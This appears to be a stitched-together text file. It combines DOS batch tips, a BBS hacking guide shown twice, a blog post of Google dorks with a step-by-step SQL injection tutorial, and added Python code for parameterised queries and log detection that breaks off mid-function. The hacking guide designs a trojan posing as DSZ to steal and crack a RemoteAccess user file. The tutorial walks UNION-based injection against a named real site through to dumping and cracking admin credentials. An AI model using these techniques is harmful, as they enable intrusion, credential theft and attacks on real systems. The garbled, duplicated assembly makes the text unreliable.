DEVICE=C:\DOS\EMM386.EXE NOEMS
INSTALLHIGH=C:\DOS\SHARE.EXE
===========================================================================
Using : for batch file comments
-------------------------------
DOS uses a leading : to indicate a label in a batch file. If the next character following the : is a space or other non-alphanumeric character, then DOS will decide it's an invalid label and skip to the next line, performing no further action. Faster batch file processing is achieved using this method for comments instead of REM commands.
===========================================================================
REM in lines with pipes or redirection
--------------------------------------
For example: REM echo y | del *.*
Problems are encountered when trying to REM out an "echo y | del *.*" line in a batch file. The problem appears to only occur if there is a pipe or redirection in the REMed out line, which shows that DOS first reads the entire line and processes pipes and redirections first, and then goes back to find out what to do with them in the line. It's actually doing what it thinks you've told it: Piping the output of REM to DEL. Since REM has no output, DEL hangs, waiting for the answer to its question.
===========================================================================
Delimiter character
-------------------
Prior to DOS 5.0, there was an undocumented DOS function that would allow you to set the DOS option delimiter character to something else, like a dash (-). Once you did this, you could use either \ or / in PATH specifications.
DOS 5.0 removed the function to set the option delimiter, but retained the function to query what it currently is.
(Unfortunately, no further details were provided in this file, so not sure if the delimiter character can still be changed somehow.)
(The REAL way to hack RemoteAccess)
Well dewdz, ya seen the file text about hacking RemoteAccess and you wanna
crack that H/P or warez RA board for mega ratios? Get Real!
RA *CAN* be hacked but only in the same way as any other BBS sox... no
sysop reading that file was shat themselves .. here's why not:
Basically the technique outlined involved you writing a trojan and
disguising it as some program the sysop is really gagging for in the hope
is he'll run it on his system. Wot it'll really do is copy his USER.BBS
onto the filebase so you can call back later and d/l it... neat idea, and
one that in *theory* will work with most BBS sox (most are EVEN easier coz
they don't encrypt the users file like RA) but their execution of it sucks!
Firstly, their compiled batch file relied on the sysop running RA off their
C: drive from the directory \RA... Yeah, maybe some lame PD board they
hang out on is like that but most sysops I know run multiple drives and
many have more complex directory structures... Lame Hacker 0 - Sysop 1
Okay... letz assume they got on some lame fucking board and the users file
*is* C:\RA\USERS.BBS - next step is to copy the file into the filebase and
make it d/lable. How do they do that? (patronising Dez Lymon voice) <g>.
Their idea was to copy the file into D:\FILES\UPLOAD .. Yeah sure guyz...
EVERY board uses the D: drive for the filebase and happen to have a file
area in \FILES\UPLOAD - NOT!!!!!! Lame Hacker 0 - Sysop 2
Right, so they got better odds than winning the national fucking lottery and
all the above worked (yeah man, we're dreamin' but let's give 'em a chance).
What next? The file has to be d/lable... you found a sysop that makes
UNCHECKED & UNSCANNED files available for download? Fuck off! Get a life!
Lame Hacker 0 - Sysop 3
So... okay.... we got a sysop that's so fucking lame he doesn't deserve
to breathe the same air as the rest of the human race and uses all the
above paths and makes unchecked uploads d/lable. RA by default won't allow
files to be d/led UNLESS they're in the file database. Unless the USERS.BBS
destination ALREADY EXISTED in that area and was previously in the area
database there's NO WAY you can d/l it.
The way they "solved" this was to add an entry to FILES.BBS in the file
directory. Nice one... EXCEPT RA DOESN'T USE FILES.BBS AS ITS FILE
DATABASE. Unless you happen to be lucky enough that the sysop does an
import from FILES.BBS to the REAL file database before checking out your
planted file (most RA sysops only import from FILES.BBS when adding CDROMs)
the addition of this entry will do FUCK ALL! Lame Hacker 0 - Sysop 4
To quote from the author "This is a generic program and you will have to
tailor it so it will meet your needs." - yeah man, fucking rethink, redesign
and rewrite it more like!
Oh yeah... EVEN IF YOU DO get a copy of the USER.BBS file downloaded THE
PASSWORDS ARE ENCRYPTED!!! Lame Hacker :( - Sysop:-)
So how can U hack RA? Well, the idea was okay but, like hacking any system,
you gotta KNOW the system ya gonna hack b4 U stand a chance.
Most sysops will use the DOS environment variable RA set to the RA system
directory so that external doors can find the system files... that's very
helpful of the sysop, to show us where we can find his config files. <g>
In the RA system directory should be the file CONFIG.RA. You might want to
include a check for this file within your program and possibly do a disk
and directory scan for the file if RA isn't defined or is set incorrectly.
I'm not *entirely* sure about other versions of RA, but in the current
release (2.02) the CONFIG.RA offset &h3E4 is where the name of the mail
directory starts. This is the path where USERS.BBS will be found.
Next you need to know for SURE the name of a directory which stores the
files for a filearea from which you are able to download.
I suggest you do this in one of three ways:
1) Interrogate the file FILES.RA in the RA system directory which contains
the filebase area configs. You *could* just search the directory for a
valid path but you wouldn't know if you had d/l access to the area.
2) If you want to be a bit more clever you could interpret the file and
find out the minimum security level required to d/l from each area and
dump your copy of USERS.BBS in the area with the lowest access level,
pretty much guaranteeing that you'll be able to get to the file. This
doesn't take security flags into account so there's still a SLIM
possibility you won't be able to d/l the file unless you also write flag
testing into your program.
3) My favourite technique is to have the program read a small config file
which is uploaded with your archive. This file just contains the name
of a file you KNOW you have d/l access from. You can then either do a
global search for that filename or, preferably (coz it's faster) read
FILES.RA for the paths used by the filebase and search those.
So now you have the location of the USERS.BBS and the destination directory
you simply need to copy the file. However, even though the file is sitting
in a filebase directory it STILL isn't available for d/l... why? Because
it's not in the filearea database.
You could get clever and find and amend filearea database files directly if you
get the fileareas path from CONFIG.RA (offset &hC12) and write to the files
HDR\FBD#####.HDR (header) IDX\FDB#####.IDX (index) and, if you want to add
a description, TXT\FBD#####.TXT, where ##### is the RA file area number.
There *is* an easier way. Shell out to DOS and execute the RAFILE utility
from the RA program path, passing the arguments "ADOPT filename #####".
E.g. the BASIC command would be:
SHELL "RAFILE ADOPT "+filename$+STR$(areanum)
Where filename$ contains the name of your USERS.BBS copy and areanum is the
RA filearea number. If your filename was USERTEST.ZIP and you'd copied it
to the directory used for RA file area 10 you'd be executing:
RAFILE ADOPT USERTEST.ZIP 10
This will "adopt" the file, adding it to the RA file database, making it
available for d/l (assuming you have the appropriate rights to the area).
All you need to do now is to package this trojan file to entice the sysop
into running it... In the LAME method for hacking RA the author used DSZ
as an example. That was about the most realistic part of the file and the
only bit worth leaching! <g>
Your archive:
DSZ.EXE (your program)
DSZ.DAT (the *real* DSZ.EXE)
DSZ.CFG (small file containing the name of a *known*
d/lable file - preferably encrypted)
+ any other files that normally come with DSZ
Flow diagram for DSZ.EXE trojan:
_______
/ \
| Start |
\_______/
|
|
+--------+--------+
| Read enviroment |
| variable RA |
+--------+--------+
|
|
/ \
/ \
/CONFIG.RA\ +---------------------+
/ exist in \___>____| Scan drives & paths |
\ that path / No | search for the file |
\ ? / +----------+----------+
\ / |
\ / |
Yes | |
+------------<-------------+
|
+--------+--------+
| Read CONFIG.RA |
| to get location |
| of USERS.BBS |
+--------+--------+
|
|
+--------+--------+
| Read DSZ.CFG to |
| get a filename |
+--------+--------+
|_____________<____________
| |
+--------+--------+ |
| Read FILES.RA to| |
| get name of the | |
| next filearea | |
+--------+--------+ |
| |
| |
/ \ |
/ \ |
/does area\ |
/ contain the \________>__________|
\ file / No
\ ? /
\ /
\ /
Yes |
|
+--------+--------+
| Copy USERS.BBS |
| to the filearea |
| directory |
+--------+--------+
|
|
+--------+--------+
| Run RAFILE with |
| ADOPT to update |
| RA database |
+--------+--------+
|
|
+--------+--------+
| Delete DSZ.EXE |
| and DSZ.CFG |
+--------+--------+
|
|
+--------+--------+
| Rename DSZ.DAT |
| to DSZ.EXE |
+--------+--------+
|
___|___
/ \
| Stop! |
\_______/
Once you've uploaded the file, preferably using a pseudonym, post the sysop
a message telling him how c00l your upload is. Wait a day or so and dial
back. Do a filename search using the name you decided to use for your copy
of USERS.BBS and d/l it.
The next step, now you have the USERS.BBS file is to crack the passwords.
I only know of ONE crack program out there which has the RA password
encryption algorithm, a program based on the popular Unix CRACKERJACK
program called RA-CRACK. This simply takes a given word, encrypts it, and
compares it to the USERS.BBS file to find a user with a matching password.
RA-CRACK takes its source words from a text file so it would be possible
to either:
a) Use a TXT dictionary file as the source. All passwords that are
normal words will be found. This method will usually find about 90%
of the user passwords.
b) Write a "brute force" cracker using a small routine that "counts"
through valid ASCII character combinations from "!" (ASCII 33) up to
a string containing 25 (max length of a RA password) null characters
(ASCII 255), passing these via a text file to RA-CRACK. This SHOULD
be _100%_ successful, but SLOW!
crack that H/P or warez RA board for mega ratios? Get Real!
RA *CAN* be hacked but only in the same way as any other BBS sox... no
sysop reading that file was shat themselves .. here's why not:
Basically the technique outlined involved you writing a trojan and
disguising it as some program the sysop is really gagging for in the hope
is he'll run it on his system. Wot it'll really do is copy his USER.BBS
onto the filebase so you can call back later and d/l it... neat idea, and
one that in *theory* will work with most BBS sox (most are EVEN easier coz
they don't encrypt the users file like RA) but their execution of it sucks!
Firstly, their compiled batch file relied on the sysop running RA off their
C: drive from the directory \RA... Yeah, maybe some lame PD board they
hang out on is like that but most sysops I know run multiple drives and
many have more complex directory structures... Lame Hacker 0 - Sysop 1
Okay... letz assume they got on some lame fucking board and the users file
*is* C:\RA\USERS.BBS - next step is to copy the file into the filebase and
make it d/lable. How do they do that? (patronising Dez Lymon voice) <g>.
Their idea was to copy the file into D:\FILES\UPLOAD .. Yeah sure guyz...
EVERY board uses the D: drive for the filebase and happen to have a file
area in \FILES\UPLOAD - NOT!!!!!! Lame Hacker 0 - Sysop 2
Right, so they got better odds than winning the national fucking lottery and
all the above worked (yeah man, we're dreamin' but let's give 'em a chance).
What next? The file has to be d/lable... you found a sysop that makes
UNCHECKED & UNSCANNED files available for download? Fuck off! Get a life!
Lame Hacker 0 - Sysop 3
So... okay.... we got a sysop that's so fucking lame he doesn't deserve
to to breath the same air as the rest of the human race and uses all the
above paths and makes unchecked uploads d/lable. RA by default won't allow
files to be d/led UNLESS they're in the file database. Unless the USERS.BBS
destination ALREADY EXISTED in that area and was previously in the area
database there's NO WAY you can d/l it.
The way they "solved" this was to add an entry to FILES.BBS in the file
directory. Nice one... EXCEPT RA DOESN'T USE FILES.BBS AS IT'S FILE
DATABASE. Unless you happen to be lucky enough that the sysop does an
import from FILES.BBS to the REAL file database before checking out your
planted file (most RA sysops only import from FILES.BBS when adding CDROMs)
the addition of this entry will do FUCK ALL! Lame Hacker 0 - Sysop 4
To quote from the author "This is a generic program and you will have to
tailor it so it will meet your needs." - yeah man, fucking rethink, redesign
and rewrite it more like!
Oh yeah... EVEN IF YOU DO get a copy of the USER.BBS file downloaded THE
PASSWORDS ARE ENCRYPTED!!! Lame Hacker :( - Sysop:-)
So how can U hack RA? Well, the idea was okay but, like hacking any system,
you gotta KNOW the system ya gonna hack b4 U stand a chance.
Most sysops will use the DOS environment variable RA set to the RA system
directory so that external doors can find the system files... that's very
helpful of the sysop, to show us where we can find his config files. <g>
In the RA system directory should be the file CONFIG.RA. You might want to
include a check for this file within your program and possibly do a disk
and directory scan for the file if RA isn't defined or is set incorrectly.
I'm not *entirely* sure about other versions of RA, but in the current
release (2.02) the CONFIG.RA offset &h3E4 is where the name of the mail
directory starts. This is the path where USERS.BBS will be found.
Next you need to know for SURE the name of a directory which stores the
files for a filearea from which you are able to download.
I suggest you do this in one of three ways:
1) Interogate the file FILES.RA in the RA system directory which contains
the filebase area configs. You *could* just search the directory for a
valid path but you'd wouldn't know if you had d/l access to the area.
2) If you want to be a bit more clever you could interpret the file and
find out the minimum security level required to d/l from each area and
dump your copy of USERS.BBS in the area with the lowest access level,
pretty much guaranteeing that you'll be able to get to the file. This
doesn't take security flags into account so there's still a SLIM
possiblity you won't be able to d/l the file unless you also write flag
testing into your program.
3) My favourite technique is to have the program read a small config file
which is uploaded with your archive. This file just contains the name
of a file you KNOW you have d/l access from. You can then either do a
global search for that filename or, preferably (coz it's faster) read
FILES.RA for the paths used by the filebase and search those.
So now you have the location of the USERS.BBS and the destination directory
you simply need to copy the file. However, even though the file is sitting
in a filebase directory it STILL isn't available for d/l... why? Because
it's not in the filearea database.
You could get clever and find amend filearea database files directly if you
get the fileareas path from CONFIG.RA (offset &hC12) and write to the files
HDR\FBD#####.HDR (header) IDX\FDB#####.IDX (index) and, if you want to add
a description, TXT\FBD#####.TXT, where ##### is the RA file area number.
There *is* an easier way. Shell out to DOS and execute the RAFILE utility
from the RA program path, passing the arguments "ADOPT filename #####".
E.g. the BASIC command would be:
SHELL "RAFILE ADOPT "+filename$+STR$(areanum)
Where filename$ contains the name of your USERS.BBS copy and areanum is the
RA filearea number. If your filename was USERTEST.ZIP and you'd copied it
to the directory used for RA file area 10 you'd be executing:
RAFILE ADOPT USERTEST.ZIP 10
This will "adopt" the file, adding it to the RA file database, making it
available for d/l (assuming you have the appropriate rights to the area).
All you need to do now is to package this trojan file to entice the sysop
into running it... In the LAME method for hacking RA the author used DSZ
as an example. That was about the most realistic part of the file and the
only bit worth leaching! <g>
Your archive:
DSZ.EXE (your program)
DSZ.DAT (the *real* DSZ.EXE)
DSZ.CFG (small file containing the name of a *known*
d/lable file - preferabbly encrypted)
+ any other files that normally come with DSZ
Flow diagram for DSZ.EXE trojan:
_______
/ \
| Start |
\_______/
|
|
+--------+--------+
| Read enviroment |
| variable RA |
+--------+--------+
|
|
/ \
/ \
/CONFIG.RA\ +---------------------+
/ exist in \___>____| Scan drives & paths |
\ that path / No | search for the file |
\ ? / +----------+----------+
\ / |
\ / |
Yes | |
+------------<-------------+
|
+--------+--------+
| Read CONFIG.RA |
| to get location |
| of USERS.BBS |
+--------+--------+
|
|
+--------+--------+
| Read DSZ.CFG to |
| get a filename |
+--------+--------+
|_____________<____________
| |
+--------+--------+ |
| Read FILES.RA to| |
| get name of the | |
| next filearea | |
+--------+--------+ |
| |
| |
/ \ |
/ \ |
/does area\ |
/ contain the \________>__________|
\ file / No
\ ? /
\ /
\ /
Yes |
|
+--------+--------+
| Copy USERS.BBS |
| to the filearea |
| directory |
+--------+--------+
|
|
+--------+--------+
| Run RAFILE with |
| ADOPT to update |
| RA database |
+--------+--------+
|
|
+--------+--------+
| Delete DSZ.EXE |
| and DSZ.CFG |
+--------+--------+
|
|
+--------+--------+
| Rename DSZ.DAT |
| to DSZ.EXE |
+--------+--------+
|
___|___
/ \
| Stop! |
\_______/
Once you've uploaded the file, preferably using a pseudonym, post the sysop
a message telling him how c00l your upload is. Wait a day or so and dial
back. Do a filename search using the name you decided to use for your copy
of USERS.BBS and d/l it.
The next step, now you have the USERS.BBS file, is to crack the passwords.
I only know of ONE crack program out there which has the RA password
encryption algorithm, a program based on the popular Unix CRACKERJACK
program called RA-CRACK. This simply takes a given word, encrypts it, and
compares it to the USERS.BBS file to find a user with a matching password.
RA-CRACK takes its source words from a text file so it would be possible
to either:
a) Use a TXT dictionary file as the source. All passwords that are
normal words will be found. This method will usually find about 90%
of the user passwords.
b) Write a "brute force" cracker using a small routine that "counts"
through valid ASCII character combinations from "!" (ASCII 33) up to
a string containing 25 (max length of an RA password) null characters
(ASCII 255), passing these via a text file to RA-CRACK. This SHOULD
be _100%_ successful, but SLOW!
Tuesday, 2 October 2012
SQL INJECTION DORK LIST AND HOW TO
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
page.php?file=
newsDetail.php?id=
gallery.php?id=
article.php?id=
play_old.php?id=
show.php?id=
staff_id=
newsitem.php?num=
readnews.php?id=
top10.php?cat=
historialeer.php?num=
reagir.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
newsone.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
product-item.php?id=
sql.php?id=
news_view.php?id=
select_biblio.php?id=
humor.php?id=
aboutbook.php?id=
fiche_spectacle.php?id=
communique_detail.php?id=
sem.php3?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
preview.php?id=
loadpsb.php?id=
opinions.php?id=
spr.php?id=
pages.php?id=
announce.php?id=
clanek.php4?id=
participant.php?id=
download.php?id=
main.php?id=
review.php?id=
chappies.php?id=
read.php?id=
prod_detail.php?id=
viewphoto.php?id=
article.php?id=
play_old.php?id=
declaration_more.php?decl_id=
category.php?id=
publications.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
Productinfo.php?id=
website.php?id=
Productinfo.php?id=
showimg.php?id=
view.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
detail.php?ID=
collectionitem.php?id=
band_info.php?id=
product.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
tradeCategory.php?id=
shop_category.php?id=
transcript.php?id=
channel_id=
item_id=
newsid=
trainers.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
iniziativa.php?in=
detail_new.php?id=
tekst.php?idt=
newscat.php?id=
newsticker_info.php?idn=
rubrika.php?idr=
rubp.php?idr=
offer.php?idf=
hotel.php?id=
art.php?idm=
title.php?id=
look.php?ID=
story.php?id=
labels.php?id=
review.php?id=
chappies.php?id=
news-full.php?id=
news_display.php?getid=
index2.php?option=
ages.php?id=
"id=" & intext:"Warning: mysql_fetch_assoc()
"id=" & intext:"Warning: mysql_fetch_array()
"id=" & intext:"Warning: mysql_num_rows()
"id=" & intext:"Warning: session_start()
"id=" & intext:"Warning: getimagesize()
"id=" & intext:"Warning: Unknown()
"id=" & intext:"Warning: pg_exec()
"id=" & intext:"Warning: array_merge()
"id=" & intext:"Warning: mysql_result()
"id=" & intext:"Warning: mysql_num_rows()
"id=" & intext:"Warning: mysql_query()
"id=" & intext:"Warning: filesize()
"id=" & intext:"Warning: require()
Now to check manually a site if it is vulnerable, just add ' at the end of the url:
For example, we have our target,
Code:
http://www.cocobod.gh/news_details.php?id=30
Now, we want to check if this is SQLi vulnerable, so we add ' at the end:
Code:
http://www.cocobod.gh/news_details.php?id=30'
If we get an error, that means the site is vulnerable!
So, now we move on to the next step.
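Why the quote probe above produces an error, and what closes it, as an added illustration (not code from the original post or from the site it names): a Python sqlite3 stand-in for the PHP lookup with a constructed `news` table. Both functions take the raw `id` value; the first splices it into the SQL text the way the probed page evidently does, the second binds it as a parameter. The table, rows and function names are assumptions made for this example.

```python
import sqlite3

# Constructed sample table standing in for a news site's backend; the rows
# and names are placeholders, not data from the site discussed above.
ROWS = [(30, "Harvest report"), (31, "Board meeting")]


def make_db() -> sqlite3.Connection:
    """Build the in-memory sample database."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE news (id INTEGER, title TEXT)")
    con.executemany("INSERT INTO news VALUES (?, ?)", ROWS)
    return con


def fetch_vulnerable(con, raw_id: str):
    """The pattern the tutorial probes for: the URL parameter is spliced into
    the SQL text, so a stray quote changes the statement and the database
    reports a syntax error (the 'error means vulnerable' signal above).
    Returns (rows, error_message)."""
    sql = "SELECT title FROM news WHERE id = " + raw_id
    try:
        return con.execute(sql).fetchall(), None
    except sqlite3.Error as exc:
        return None, str(exc)


def fetch_parameterised(con, raw_id: str):
    """Same lookup with a bound parameter: the driver ships the value apart
    from the statement, so "30'" is compared as the literal text 30' and
    simply matches nothing. No error leaks and no payload reaches the parser."""
    try:
        rows = con.execute("SELECT title FROM news WHERE id = ?", (raw_id,)).fetchall()
        return rows, None
    except sqlite3.Error as exc:
        return None, str(exc)


def probe(con, raw_id: str) -> dict:
    """Run both forms on one input so the difference can be seen side by side."""
    return {"vulnerable": fetch_vulnerable(con, raw_id),
            "parameterised": fetch_parameterised(con, raw_id)}


if __name__ == "__main__":
    db = make_db()
    for candidate in ("30", "30'"):
        print(candidate, probe(db, candidate))
```

Running it shows `30` returning the row in both forms, while `30'` raises a syntax error from the concatenated query but matches nothing in the parameterised one. In PHP the equivalent fix is a prepared statement (PDO or mysqli with bound parameters), or at minimum casting `$_GET['id']` to an integer before it goes anywhere near the query.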
How To Find Columns Count:
After you have your vulnerable site, you need to know its column count. To do this, just add "order by X--" at the end of the URL,
where X is a number from 1 upwards.
For example, we have our target server and we try to count columns:
we add order by 1-- at the end, then order by 2--, etc. Always increase the number until you get an error in your
So, on our target server, we have tried this:
Code:
http://www.cocobod.gh/news_details.php?id=30 order by 1-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 2-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 3-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 4-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 5-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 6-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 7-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 8-- >> Unknown column
That means that the 8th column does not exist, so the column count is 7!
How to Find The Accessible Columns:
Now we know that the column count is 7. The next step is to check for accessible columns; to do that, we use the query "UNION SELECT number,of,columns--" like this:
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,6,7--
You will get something like this:
That means that we can get information from the site from the 6th, the 2nd and the 3rd column!
How To Get MySQL DB Version:
We need to know the MySQL DB version to know whether we can exploit this site or not: on a site using MySQL 4.x.x this method will not work (the information_schema tables the following steps query only exist from 5.0 on), but every 5.x.x or above is exploitable.
So to learn the MySQL DB version, just replace the number of the used column with "@@version".
For example:
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,@@version,7--
That means that we can continue working on this site.
How To Find Database Name:
Now we are going to inject the site to find the DB name.
To do this, replace the used column number with "group_concat(schema_name)", and add "from information_schema.schemata--" after the last column number, for example:
Code:
http://www.cocobod.gh/news_details.php?id=30
union select 1,2,3,4,5,group_concat(schema_name),7 from
information_schema.schemata--
Now, to use the one the website uses, replace "group_concat(schema_name)" with "concat(database())" for example:
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,concat(database()),7 from information_schema.schemata--
Congrats, you got the used DB!
How to Get The Table Names:
Now we need to get table names, to do this, replace the used column number with "group_concat(table_name)" and add "from information_schema.tables where table_schema=database()--" at the end of columns number.
Code:
http://www.cocobod.gh/news_details.php?id=30
union select 1,2,3,4,5,group_concat(table_name),7 from
information_schema.tables where table_schema=database()--
How To Get Column Names:
To get column names, we will use this query:
group_concat(column_name)
from information_schema.columns where table_schema=database()--
Example:
Code:
http://www.cocobod.gh/news_details.php?id=30
union select 1,2,3,4,5,group_concat(column_name),7 from
information_schema.columns where table_schema=database()--
How To Get Information From Columns:
Now we are at our final step: getting the admin info from the columns. How do we do it?
Simple, follow this example:
Code:
http://www.site.com/news_details.php?id=30
union select
1,2,3,4,5,group_concat(columnusername,0x3a,columnpassword),7 from
currentdb.tableused--
So our exploit will be like this:
Code:
http://www.cocobod.gh/news_details.php?id=30
union select 1,2,3,4,5,group_concat(username,0x3a,password),7 from
cocobod_gh.coc_admin--
Now we need to crack the password, which is stored as an MD5 hash:
go to http://www.md5decrypter.co.uk/, paste your hash, fill in the captcha and click on decrypt; with a little luck you will get the password like here:
We have successfully injected a website and got the admin info! Thank you for reading my TuT!
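The whole sequence above (quote probe, ORDER BY ladder, UNION SELECT, @@version, information_schema) leaves a recognisable trail in the web server's access log. Added defensive example, not part of the original tutorial: a Python script that parses Apache combined-format lines, decodes the query string and aggregates the indicators per source address, flagging the column-counting ladder when one address walks ORDER BY upward. The log lines, addresses and the path `/news_details.php` are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed Apache "combined" log lines; addresses, times and sizes are placeholders.
SAMPLE_LOG = """\
203.0.113.7 - - [02/Oct/2012:10:01:02 +0000] "GET /news_details.php?id=30 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [02/Oct/2012:10:01:09 +0000] "GET /news_details.php?id=30%27 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.7 - - [02/Oct/2012:10:01:20 +0000] "GET /news_details.php?id=30+order+by+1-- HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [02/Oct/2012:10:01:24 +0000] "GET /news_details.php?id=30+order+by+2-- HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [02/Oct/2012:10:01:29 +0000] "GET /news_details.php?id=30+order+by+3-- HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [02/Oct/2012:10:01:58 +0000] "GET /news_details.php?id=30+order+by+8-- HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.7 - - [02/Oct/2012:10:02:30 +0000] "GET /news_details.php?id=30+union+select+1,2,3,4,5,@@version,7-- HTTP/1.1" 200 5100 "-" "Mozilla/5.0"
203.0.113.7 - - [02/Oct/2012:10:03:11 +0000] "GET /news_details.php?id=30+union+select+1,2,3,4,5,group_concat(table_name),7+from+information_schema.tables+where+table_schema=database()-- HTTP/1.1" 200 6400 "-" "Mozilla/5.0"
198.51.100.4 - - [02/Oct/2012:10:03:40 +0000] "GET /news_details.php?id=31 HTTP/1.1" 200 4980 "-" "Mozilla/5.0"
"""

# Apache combined format: ip ident user [time] "METHOD target PROTO" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)')

# Indicators matched against the URL-decoded query string (case-insensitive).
SIGNALS = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\.", re.I),
    "version_probe": re.compile(r"@@version|\bversion\s*\(\s*\)", re.I),
    "group_concat": re.compile(r"\bgroup_concat\s*\(", re.I),
}
ORDER_BY_RE = re.compile(r"\border\s+by\s+(\d+)", re.I)


def classify_request(target: str) -> tuple[set, list]:
    """Return (signal names, ORDER BY numbers) found in one request target."""
    query = urlsplit(target).query
    decoded = unquote_plus(query)          # %27 -> ', + -> space, so payloads read as typed
    found = {name for name, rx in SIGNALS.items() if rx.search(decoded)}
    # The tutorial's first probe: a lone quote appended to a parameter value.
    if any(v.rstrip().endswith("'") for _, v in parse_qsl(query, keep_blank_values=True)):
        found.add("quote_probe")
    order_by = [int(n) for n in ORDER_BY_RE.findall(decoded)]
    if order_by:
        found.add("order_by")
    return found, order_by


def longest_increasing_run(values: list) -> int:
    """Length of the longest strictly increasing run in log order."""
    best = run = 0
    prev = None
    for v in values:
        run = run + 1 if prev is not None and v > prev else 1
        best = max(best, run)
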